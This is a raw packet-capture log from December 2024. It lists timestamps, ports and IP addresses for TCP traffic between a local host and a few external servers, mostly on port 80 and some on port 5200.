Dec 9, 2024 08:08:58.110212088 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:58.110215902 CET	49917	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:58.112132072 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.112310886 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.112375975 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.112375975 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.112684011 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.112987041 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.113230944 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.113284111 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.113380909 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.113434076 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.113590002 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.113631964 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.113965988 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.114334106 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.114432096 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.114712000 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.115135908 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.115164042 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.115441084 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.115966082 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.115989923 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.116178989 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.116205931 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.116776943 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.116887093 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.116945028 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.116983891 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.117141962 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.117600918 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.117804050 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.117830038 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.118340015 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.118439913 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.118495941 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.118675947 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.118736982 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.119266033 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.119333982 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.119436026 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.119447947 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:58.119489908 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.119493961 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:58.120062113 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.120186090 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.120255947 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.120863914 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.120888948 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.121052027 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.121679068 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.121726036 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.121865988 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.122505903 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.122530937 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.122684002 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.123063087 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.123286963 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.123402119 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.173688889 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.173835993 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.173862934 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.174024105 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.174257994 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.174285889 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.174603939 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.175004005 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.175029993 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.175551891 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.175915956 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.178004026 CET	5200	49925	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:58.178195000 CET	49925	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:58.178195000 CET	49925	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:58.220618963 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.220777035 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.220803976 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.221102953 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.221184015 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.221527100 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.221551895 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.221982002 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.224060059 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.237669945 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.237725019 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.237817049 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.237912893 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.238229990 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.238286972 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.238624096 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.238711119 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.238908052 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.239120007 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.239615917 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.239644051 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.239867926 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.240094900 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.240236998 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.240704060 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.240981102 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.241004944 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.241162062 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.241519928 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.241728067 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.241755962 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.242082119 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.242302895 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.242438078 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.242624044 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.243129969 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.243407011 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.243956089 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.243983030 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.244158030 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.244765997 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.244795084 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.244961977 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.245119095 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.245599985 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.245811939 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.245841980 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.246418953 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.246577978 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.246637106 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.247214079 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.247242928 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.247600079 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.248059988 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.248085022 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.248244047 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.248271942 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.248533964 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.249007940 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.251737118 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.297519922 CET	5200	49925	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:58.298583984 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.298762083 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.299139977 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.299169064 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.299518108 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.299876928 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.299911976 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.300246000 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.300272942 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.300518036 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.300601959 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.300681114 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.345603943 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.345720053 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.345757008 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.345799923 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.346138954 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.346479893 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.346506119 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.352092981 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.362911940 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.362972975 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.363111973 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.363168955 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.363480091 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.363535881 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.363835096 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.363877058 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.364216089 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.364574909 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.364619017 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.364773989 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.364814043 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.365140915 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.365588903 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.365638971 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.365906000 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.366406918 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.366455078 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.366736889 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.367194891 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.367239952 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.367527008 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.367568016 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.368016005 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.368103981 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.368253946 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.368839025 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.368884087 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.369005919 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.369637012 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.369678020 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.369839907 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.369880915 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.370498896 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.370625973 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.370651007 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.370690107 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.371253014 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.371459007 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.371501923 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.372102022 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.372284889 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.372329950 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.372932911 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.372971058 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.373116016 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.373728991 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.373769999 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.373861074 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.374419928 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.424004078 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.424062967 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.424132109 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.424438000 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.424803972 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.424846888 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.425220966 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.425590992 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.425616980 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.425633907 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.425915956 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.428105116 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.473563910 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.473577976 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.473587990 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.473599911 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.473613024 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.473625898 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.473654985 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.488662004 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.488718987 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.489037991 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.489048958 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.489094973 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.489502907 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.489619970 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.489801884 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.489852905 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.490190983 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.490201950 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.490246058 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.490623951 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.490665913 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.491498947 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.491518974 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.491530895 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.491559029 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.491571903 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.491677046 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.491719961 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.492847919 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.492904902 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.493302107 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.493422031 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.493752003 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.493787050 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.493947983 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.494544029 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.494580030 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.494882107 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.495372057 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.495424986 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.495492935 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.495537996 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.496083021 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.496246099 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.496294022 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.496887922 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.497042894 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.497088909 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.497627974 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.497639894 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.497684002 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.498008966 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.498186111 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.498229027 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.498807907 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.498852968 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.498974085 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.500113964 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.550698996 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.550829887 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.550873041 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.550931931 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.551386118 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.551423073 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.551904917 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.552103043 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.552457094 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.552979946 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.553025961 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.553544998 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.553586006 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.601916075 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.601970911 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.602087021 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.602173090 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.602447033 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.602503061 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.602818012 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.602861881 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.603156090 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.603199959 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.613430023 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.613487005 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.613646984 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.613691092 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.614007950 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.614048958 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.614375114 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.614468098 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.614518881 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.614583015 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.614881039 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.614916086 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.615250111 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.615308046 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.615586996 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:58.615731955 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.697329044 CET	80	49921	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:58.700139046 CET	49921	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:58.850928068 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:58.887701035 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:58.892441034 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:58.970276117 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:59.007035971 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.007299900 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.007966995 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.011693954 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.011894941 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.011938095 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.012310028 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.012795925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.012842894 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.013519049 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.013726950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.013854027 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.014686108 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.014965057 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.015012026 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.015856981 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.016083002 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.016127110 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.017163038 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.017389059 CET	80	49886	185.215.113.16	192.168.2.4
